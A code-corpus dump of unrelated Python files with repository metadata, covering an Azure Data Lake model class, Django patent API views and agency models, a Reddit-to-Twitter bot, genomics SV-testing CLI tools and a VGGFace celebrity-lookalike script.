# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .catalog_item import CatalogItem
class USqlExternalDataSource(CatalogItem):
"""A Data Lake Analytics catalog U-SQL external datasource item.
:param compute_account_name: the name of the Data Lake Analytics account.
:type compute_account_name: str
:param version: the version of the catalog item.
:type version: str
:param database_name: the name of the database.
:type database_name: str
:param name: the name of the external data source.
:type name: str
:param provider: the name of the provider for the external data source.
:type provider: str
:param provider_string: the name of the provider string for the external
data source.
:type provider_string: str
:param pushdown_types: the list of types to push down from the external
data source.
:type pushdown_types: list of str
"""
_attribute_map = {
'compute_account_name': {'key': 'computeAccountName', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'database_name': {'key': 'databaseName', 'type': 'str'},
'name': {'key': 'externalDataSourceName', 'type': 'str'},
'provider': {'key': 'provider', 'type': 'str'},
'provider_string': {'key': 'providerString', 'type': 'str'},
'pushdown_types': {'key': 'pushdownTypes', 'type': '[str]'},
}
def __init__(self, compute_account_name=None, version=None, database_name=None, name=None, provider=None, provider_string=None, pushdown_types=None):
super(USqlExternalDataSource, self).__init__(compute_account_name=compute_account_name, version=version)
self.database_name = database_name
self.name = name
self.provider = provider
self.provider_string = provider_string
self.pushdown_types = pushdown_types
| 44.132075 | 154 | 0.632322 | ["Unlicense", "MIT"] | amcclead7336/Enterprise_Data_Science_Final | venv/lib/python3.8/site-packages/azure/mgmt/datalake/analytics/catalog/models/usql_external_data_source.py | 2,339 | Python |
# This module just exists as a shortcut for running the main Kivy app
if __name__ == '__main__':
from naturtag.app.app import NaturtagApp
NaturtagApp().run()
| 27.833333 | 69 | 0.730539 | ["MIT"] | JWCook/naturtag | naturtag/ui.py | 167 | Python |
from django_filters.rest_framework import DjangoFilterBackend, FilterSet
from rest_framework import generics, viewsets, permissions
from rest_framework import filters
from drf_haystack.viewsets import HaystackViewSet
from drf_haystack.filters import HaystackAutocompleteFilter
from drf_haystack.serializers import HaystackSerializer
from patents.models import Patent
from .serializers import PatentSerializer, PatentDetailSerializer, \
PatentIndexSerializer, AutocompleteSerializer
class PatentListViewSet(viewsets.ModelViewSet):
queryset = Patent.objects.all().order_by('publication_number')
serializer_class = PatentSerializer
permission_classes = [permissions.IsAuthenticated]
filter_backends = [filters.SearchFilter]
search_fields = ['title', 'abstract', 'claims']
class PatentListAPIView(generics.ListAPIView):
queryset = Patent.objects.all()
serializer_class = PatentSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentDetailAPIView(generics.RetrieveAPIView):
queryset = Patent.objects.all()
serializer_class = PatentDetailSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentCreateAPIView(generics.CreateAPIView):
queryset = Patent.objects.all()
serializer_class = PatentDetailSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentUpdateAPIView(generics.UpdateAPIView):
queryset = Patent.objects.all()
serializer_class = PatentDetailSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentDeleteAPIView(generics.DestroyAPIView):
queryset = Patent.objects.all()
serializer_class = PatentSerializer
permission_classes = [permissions.IsAuthenticated]
class PatentFilter(FilterSet):
class Meta:
model = Patent
fields = ['publication_number', 'title', 'abstract', 'claims']
class PatentListFilterAPIView(generics.ListAPIView):
queryset = Patent.objects.all()
serializer_class = PatentSerializer
filter_backends = [DjangoFilterBackend]
filterset_class = PatentFilter
permission_classes = [permissions.IsAuthenticated]
class PatentSearchViewSet(HaystackViewSet):
index_models = [Patent]
serializer_class = PatentIndexSerializer
permission_classes = [permissions.IsAuthenticated]
class AutocompleteSearchViewSet(HaystackViewSet):
index_models = [Patent]
serializer_class = AutocompleteSerializer
filter_backends = [HaystackAutocompleteFilter]
permission_classes = [permissions.IsAuthenticated]
| 33.565789 | 72 | 0.79459 | ["MIT"] | KimHS0915/python-django-patents | api/views.py | 2,551 | Python |
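A sketch of how these views might be wired into URLs, assuming a conventional DRF/drf-haystack setup; the route names and URL layout are illustrative, not taken from the project.
from django.urls import include, path
from rest_framework import routers
from . import views

router = routers.DefaultRouter()
router.register(r'patents', views.PatentListViewSet, basename='patent')
router.register(r'search', views.PatentSearchViewSet, basename='patent-search')
router.register(r'autocomplete', views.AutocompleteSearchViewSet, basename='patent-autocomplete')

urlpatterns = [
    path('', include(router.urls)),
    path('patents/filter/', views.PatentListFilterAPIView.as_view()),
    path('patents/<int:pk>/detail/', views.PatentDetailAPIView.as_view()),
]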
#!C:\Users\John\PycharmProjects\arcadePython\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==10.0.1','console_scripts','pip3.6'
__requires__ = 'pip==10.0.1'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('pip==10.0.1', 'console_scripts', 'pip3.6')()
)
| 32.384615 | 70 | 0.672209 | ["MIT"] | JohnWJackson/arcadePython | venv/Scripts/pip3.6-script.py | 421 | Python |
from .shell import ShellRunner
from .printonly import PrintOnlyRunner
| 23.333333 | 38 | 0.857143 | ["Apache-2.0"] | 7-RED/connectedhomeip | scripts/build/runner/__init__.py | 70 | Python |
import datetime
from django.db import models
from osc_bge.users import models as user_models
# Create your models here.
class TimeStampedModel(models.Model):
created_at = models.DateTimeField(auto_now_add=True, null=True)
updated_at = models.DateTimeField(auto_now=True, null=True)
class Meta:
abstract = True
#Agent Head Table
class AgencyHead(TimeStampedModel):
PROGRAM_CHOICES = (
('secondary', 'Secondary'),
('college', 'College'),
('camp', 'Camp'),
)
name = models.CharField(max_length=80, null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
number_branches = models.CharField(max_length=80, null=True, blank=True)
capacity_students = models.CharField(max_length=255, null=True, blank=True)
commission = models.CharField(max_length=140, null=True, blank=True)
promotion = models.CharField(max_length=255, null=True, blank=True)
others = models.CharField(max_length=255, null=True, blank=True)
comment = models.TextField(null=True, blank=True)
def __str__(self):
return "{}".format(self.name)
class AgencyProgram(TimeStampedModel):
head = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
program = models.CharField(max_length=80, null=True, blank=True)
#Agent Branch Table
class Agency(TimeStampedModel):
head = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True, related_name='agent_branch')
name = models.CharField(max_length=140, null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
capacity_students = models.CharField(max_length=255, null=True, blank=True)
commission = models.CharField(max_length=140, null=True, blank=True)
promotion = models.CharField(max_length=255, null=True, blank=True)
others = models.CharField(max_length=255, null=True, blank=True)
comment = models.TextField(null=True, blank=True)
def __str__(self):
return "{}".format(self.name)
class AgencyBranchProgram(TimeStampedModel):
branch = models.ForeignKey(Agency, on_delete=models.CASCADE, null=True)
program = models.CharField(max_length=80, null=True, blank=True)
def set_filename_format(now, instance, filename):
return "{schoolname}-{microsecond}".format(
agentname=instance.agency,
microsecond=now.microsecond,
)
def agent_directory_path(instance, filename):
now = datetime.datetime.now()
path = "agents/{agentname}/{filename}".format(
agentname=instance.agency,
filename=set_filename_format(now, instance, filename),
)
return path
class AgencyHeadContactInfo(TimeStampedModel):
LEVEL_CHOICES = (
('s', 'S'),
('a', 'A'),
('b', 'B'),
('c', 'C'),
('d', 'D'),
)
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
name = models.CharField(max_length=80, null=True, blank=True)
contracted_date = models.DateTimeField(auto_now=True, null=True)
phone = models.CharField(max_length=80, null=True, blank=True)
email = models.CharField(max_length=140, null=True, blank=True)
skype = models.CharField(max_length=80, null=True, blank=True)
wechat = models.CharField(max_length=80, null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
level = models.CharField(max_length=80, null=True, blank=True)
image = models.ImageField(upload_to=agent_directory_path, null=True, blank=True)
def __str__(self):
return "{}".format(self.name)
class AgentRelationshipHistory(TimeStampedModel):
head = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
writer = models.CharField(max_length=80, null=True, blank=True)
name = models.CharField(max_length=80, null=True, blank=True)
date = models.DateField(null=True, blank=True)
location = models.CharField(max_length=140, null=True, blank=True)
category = models.CharField(max_length=80, null=True, blank=True)
priority = models.IntegerField(null=True, blank=True)
comment = models.TextField(null=True, blank=True)
class SecodnaryProgram(TimeStampedModel):
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
preriod = models.CharField(max_length=80, null=True, blank=True)
target = models.IntegerField(null=True, blank=True)
new_students_fall = models.IntegerField(null=True, blank=True)
new_students_spring = models.IntegerField(null=True, blank=True)
total_new_students_bge = models.IntegerField(null=True, blank=True)
total_students_bge = models.IntegerField(null=True, blank=True)
terminating_students = models.IntegerField(null=True, blank=True)
comments = models.TextField(null=True, blank=True)
class Camp(TimeStampedModel):
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
preriod = models.CharField(max_length=80, null=True, blank=True)
target = models.IntegerField(null=True, blank=True)
summer_camp = models.IntegerField(null=True, blank=True)
winter_camp = models.IntegerField(null=True, blank=True)
comments = models.TextField(null=True, blank=True)
class CollegeApplication(TimeStampedModel):
agent = models.ForeignKey(AgencyHead, on_delete=models.CASCADE, null=True)
preriod = models.CharField(max_length=80, null=True, blank=True)
college_application = models.IntegerField(null=True, blank=True)
other_program = models.IntegerField(null=True, blank=True)
comments = models.TextField(null=True, blank=True)
| 38.696552 | 106 | 0.724826 | ["MIT"] | jisuhan3201/osc-bge | osc_bge/agent/models.py | 5,611 | Python |
'''
First Version: Tweets contents from subreddits
'''
from time import sleep
from reddit import Reddit
from twitter import Twitter
def main():
'''
connects the pieces to grab posts from reddit and throw them on twitter
'''
reddit = Reddit()
twitter = Twitter()
tweets = reddit.get_tweets()
print("sending {} tweets".format(len(tweets)))
    for tweet in tweets:
status = twitter.send_tweet(tweet.Primary)
if tweet.Second:
twitter.send_tweet(tweet.Second, status.id)
sleep(90)
if __name__ == '__main__':
main()
| 22.923077 | 75 | 0.65604 | ["MIT"] | seanneal/tweetbot | tweet_bot.py | 596 | Python |
import sys
import json
from rule_gens import RulesForGeneration
from generate_text import generating_player_text_from_templates, generating_team_text_from_templates
from transformers import GPT2Tokenizer
print("Constructing main file ....")
test_preds = []
js = json.load(open(f'./data/jsons/2018_w_opp.json', 'r'))
tokenizer = GPT2Tokenizer.from_pretrained('gpt2')
rfg = RulesForGeneration()
print("Constructed!!\n\n")
for game_idx in range(len(js)):
# if game_idx == 0:
team_stat = generating_team_text_from_templates(js, game_idx, tokenizer)
player_stat = generating_player_text_from_templates(js, game_idx, tokenizer)
sol = [rfg.generate_defeat_sentence(js[game_idx]).strip()]
for k, v in team_stat.items():
sol.append(v.strip())
for k, v in player_stat.items():
sol.append(v.strip())
sol.append(rfg.generate_next_game_sentence(js[game_idx]).strip())
final_sol = ' '.join(sol)
if game_idx % 10 == 0:
print()
print(game_idx, final_sol)
test_preds.append(final_sol)
with open(f'./output/{sys.argv[1]}', 'w') as f:
f.write('\n'.join(test_preds))
| 27.071429 | 100 | 0.708883 | ["MIT"] | ashishu007/data2text-cbr | src/final_gen.py | 1,137 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright © 2017 Matthew Stone <[email protected]>
# Distributed under terms of the MIT license.
"""
Calculate enrichment of clipped reads or discordant pairs at SV breakpoints.
"""
import argparse
import sys
import pysam
import pandas as pd
from svtk.pesr import SRTestRunner, PETestRunner, PETest, SRTest
def sr_test(argv):
parser = argparse.ArgumentParser(
description="Calculate enrichment of clipped reads at SV breakpoints.",
prog='svtk sr-test',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf',
help='VCF of variant calls. Standardized to include '
'CHR2, END, SVTYPE, STRANDS in INFO.')
parser.add_argument('countfile', help='Tabix indexed file of split counts.'
' Columns: chrom,pos,clip,count,sample')
parser.add_argument('fout',
help='Output table of most significant start/end'
'positions.')
parser.add_argument('-w', '--window', type=int, default=100,
help='Window around variant start/end to consider for '
'split read support. [100]')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-b', '--background', type=int, default=160,
help='Number of background samples to choose for '
'comparison in t-test. [160]')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
# TODO: add normalization
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
parser.add_argument('--log', action='store_true', default=False,
help='Print progress log to stderr.')
# Print help if no arguments specified
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
vcf = pysam.VariantFile(args.vcf)
if args.index is not None:
countfile = pysam.TabixFile(args.countfile, index=args.index,
parser=pysam.asTuple())
else:
if args.countfile.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
countfile = pysam.TabixFile(args.countfile, parser=pysam.asTuple())
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = open(args.fout, 'w')
header = 'name coord pos log_pval called_median bg_median bg_frac'.split()
fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = None
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
runner = SRTestRunner(vcf, countfile, fout, args.background, args.common,
args.window, whitelist, medians=medians, log=args.log)
runner.run()
def pe_test(argv):
parser = argparse.ArgumentParser(
description="Calculate enrichment of discordant pairs at SV breakpoints.",
prog='svtk pe-test',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf', help='Variants.')
parser.add_argument('disc', help='Table of discordant pair coordinates.')
parser.add_argument('fout', type=argparse.FileType('w'),
help='Output table of PE counts.')
parser.add_argument('-o', '--window-out', type=int, default=500,
help='Window outside breakpoint to query for '
'discordant pairs. [500]')
parser.add_argument('-i', '--window-in', type=int, default=50,
help='Window inside breakpoint to query for '
'discordant pairs. [50]')
parser.add_argument('-b', '--background', type=int, default=160,
help='Number of background samples to sample for PE '
'evidence. [160]')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
parser.add_argument('--log', action='store_true', default=False,
help='Print progress log to stderr.')
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
if args.vcf in '- stdin'.split():
vcf = pysam.VariantFile(sys.stdin)
else:
vcf = pysam.VariantFile(args.vcf)
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = args.fout
header = 'name log_pval called_median bg_median bg_frac'.split()
args.fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = None
if args.index is not None:
discfile = pysam.TabixFile(args.disc, index=args.index)
else:
if args.disc.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
discfile = pysam.TabixFile(args.disc)
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
runner = PETestRunner(vcf, discfile, fout, args.background, args.common,
args.window_in, args.window_out, whitelist, medians=medians, log=args.log)
runner.run()
def count_pe(argv):
parser = argparse.ArgumentParser(
description="Count discordant pairs supporting a SV breakpoints.",
prog='svtk count-pe',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf', help='Variants.')
parser.add_argument('disc', help='Table of discordant pair coordinates.')
parser.add_argument('fout', type=argparse.FileType('w'),
help='Output table of PE counts.')
parser.add_argument('-o', '--window-out', type=int, default=500,
help='Window outside breakpoint to query for '
'discordant pairs. [500]')
parser.add_argument('-i', '--window-in', type=int, default=50,
help='Window inside breakpoint to query for '
'discordant pairs. [50]')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
if args.vcf in '- stdin'.split():
vcf = pysam.VariantFile(sys.stdin)
else:
vcf = pysam.VariantFile(args.vcf)
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = args.fout
header = 'name sample count'.split()
args.fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = [s for s in vcf.header.samples]
if args.index is not None:
discfile = pysam.TabixFile(args.disc, index=args.index)
else:
if args.disc.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
discfile = pysam.TabixFile(args.disc)
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
petest = PETest(discfile, args.common, args.window_in,
args.window_out, medians=medians)
for record in vcf:
counts = petest.load_counts(record, args.window_in, args.window_out)
counts = petest.normalize_counts(counts)
counts = counts.set_index('sample')
counts = counts.reindex(whitelist).fillna(0).astype(int)
counts = counts.reset_index()
counts['name'] = record.id
cols = 'name sample count'.split()
        for row in counts[cols].values:
fout.write('\t'.join([str(x) for x in row]) + '\n')
# counts[cols].to_csv(fout, header=False, index=False, sep='\t', na_rep='NA')
def count_sr(argv):
parser = argparse.ArgumentParser(
description="Count clipped reads at SV breakpoints. Unwindowed.",
prog='svtk count-sr',
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('vcf',
help='VCF of variant calls. Standardized to include '
'CHR2, END, SVTYPE, STRANDS in INFO.')
parser.add_argument('countfile', help='Tabix indexed file of split counts.'
' Columns: chrom,pos,clip,count,sample')
parser.add_argument('fout',
help='Output table of split read counts.')
parser.add_argument('--common', default=False,
action='store_true', help='Ignore background for common AF')
parser.add_argument('-s', '--samples', type=argparse.FileType('r'),
default=None,
help='Whitelist of samples to restrict testing to.')
parser.add_argument('--index', default=None,
help='Tabix index of discordant pair file. Required if '
'discordant pair file is hosted remotely.')
# TODO: add normalization
parser.add_argument('--medianfile', default=None,
help='Median coverage statistics for each library '
'(optional). If provided, each sample\'s split '
'counts will be normalized accordingly. '
'Same format as RdTest, one column per sample.')
# Print help if no arguments specified
if len(argv) == 0:
parser.print_help()
sys.exit(1)
args = parser.parse_args(argv)
vcf = pysam.VariantFile(args.vcf)
if args.index is not None:
countfile = pysam.TabixFile(args.countfile, index=args.index,
parser=pysam.asTuple())
else:
if args.countfile.startswith('http'):
raise Exception('Must provide tabix index with remote URL')
countfile = pysam.TabixFile(args.countfile, parser=pysam.asTuple())
if args.fout in '- stdout'.split():
fout = sys.stdout
else:
fout = open(args.fout, 'w')
header = 'name coord sample count'.split()
fout.write('\t'.join(header) + '\n')
if args.samples is not None:
whitelist = [s.strip() for s in args.samples.readlines()]
else:
whitelist = [s for s in vcf.header.samples]
if args.medianfile is not None:
medians = pd.read_table(args.medianfile)
medians = pd.melt(medians, var_name='sample', value_name='median_cov')
else:
medians = None
srtest = SRTest(countfile, args.common, window=0, medians=medians)
for record in vcf:
for coord in 'start end'.split():
if coord == 'start':
pos, strand, chrom = record.pos, record.info['STRANDS'][0], record.chrom
else:
# TODO: With a properly formatted VCF, should be using END2 instead of END here
pos, strand, chrom = record.stop, record.info['STRANDS'][1], record.info['CHR2']
counts = srtest.load_counts(chrom, pos, strand)
counts = srtest.normalize_counts(counts)
counts = counts['sample count'.split()]
counts = counts.set_index('sample')
counts = counts.reindex(whitelist).fillna(0).astype(int)
counts = counts.reset_index()
counts['name'] = record.id
counts['coord'] = coord
for row in counts[header].values:
fout.write('\t'.join([str(x) for x in row]) + '\n')
# counts[header].to_csv(fout, header=False, index=False, sep='\t', na_rep='NA')
| 42.688623 | 100 | 0.591948 | ["BSD-3-Clause"] | VJalili/gatk-sv | src/svtk/svtk/cli/pesr_test.py | 14,259 | Python |
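Each subcommand above parses an argv list, so it can be driven from Python as well as through the svtk CLI; a sketch with made-up file names, where the module path follows the file's location in the repo:
from svtk.cli.pesr_test import sr_test, count_pe

# Equivalent to: svtk sr-test variants.vcf sr_counts.txt.gz sr_results.txt -w 50 --log
sr_test(['variants.vcf', 'sr_counts.txt.gz', 'sr_results.txt', '-w', '50', '--log'])

# Equivalent to: svtk count-pe variants.vcf discordant_pairs.txt.gz pe_counts.txt
count_pe(['variants.vcf', 'discordant_pairs.txt.gz', 'pe_counts.txt'])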
#!/usr/bin/python3
def lowestPositiveInt(A):
A.sort()
index = -1
try:
index = A.index(1)
except ValueError:
return 1
# Remove all negatives and zero if 1 is found
# if index >= 0:
A = A[index:]
length = len(A)
i = 1
found = 0
while i < length and found == 0:
if A[i] > (A[i-1]+1):
found = A[i-1]+1
i = i+1
if found > 0:
return found
else:
return A[length-1]+1
def main():
sample1 = [-1, -3, -47, -10, 0, 27, 27, 0, 1, 1]
sample2 = [0, 1, 2, 3, 7, 25, -12, -14, -17, 4, 4]
sample3 = [1, 1, 5, 27, -100, -234, 3, 2, 3, 4, 4]
print("Sample 1: {}".format(lowestPositiveInt(sample1)))
print("Sample 2: {}".format(lowestPositiveInt(sample2)))
print("Sample 3: {}".format(lowestPositiveInt(sample3)))
main()
| 20.72093 | 61 | 0.485971 | ["MIT"] | gustavoromerobenitez/python-playground | codingTestIterative.py | 891 | Python |
from keras_vggface.utils import preprocess_input
from keras_vggface.vggface import VGGFace
import numpy as np
import pickle
from sklearn.metrics.pairwise import cosine_similarity
import cv2
from mtcnn import MTCNN
from PIL import Image
feature_list = np.array(pickle.load(open('artifacts/extracted_features/embedding.pkl','rb')))
filenames = pickle.load(open('artifacts/pickle_format_data/img_PICKLE_file.pkl','rb'))
model = VGGFace(model='resnet50',include_top=False,input_shape=(224,224,3),pooling='avg')
#detect face
detector = MTCNN()
# load img -> face detection
sample_img = cv2.imread('samples/saif_dup.jpg')
results = detector.detect_faces(sample_img)
x,y,width,height = results[0]['box']
face = sample_img[y:y+height,x:x+width]
# extract its features
image = Image.fromarray(face)
image = image.resize((224,224))
face_array = np.asarray(image)
face_array = face_array.astype('float32')
expanded_img = np.expand_dims(face_array,axis=0)
preprocessed_img = preprocess_input(expanded_img)
result = model.predict(preprocessed_img).flatten()
# print(result)
# print(result.shape)
# print(result.reshape(1,-1))
# find the cosine distance of current image with all the 8664 features
similarity = []
for i in range(len(feature_list)):
similarity.append(cosine_similarity(result.reshape(1,-1),feature_list[i].reshape(1,-1))[0][0])
# print(len(similarity))
index_pos = sorted(list(enumerate(similarity)),reverse=True,key=lambda x:x[1])[0][0]
#recommend that image
temp_img = cv2.imread(filenames[index_pos])
cv2.imshow('output',temp_img)
cv2.waitKey(0)
| 28.563636 | 98 | 0.771483 | ["MIT"] | entbappy/Which-Bollywood-Celebrity-You-look-like | src/testing.py | 1,571 | Python |
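A small design note on the ranking step in the script above: since only the single closest embedding is needed, the per-sample loop plus sort can be collapsed into one vectorised call; a sketch reusing the same result, feature_list and filenames variables.
import numpy as np
from sklearn.metrics.pairwise import cosine_similarity

# One vectorised similarity call over all stored embeddings, then a direct argmax.
scores = cosine_similarity(result.reshape(1, -1), feature_list)[0]
best_idx = int(np.argmax(scores))
print(filenames[best_idx], scores[best_idx])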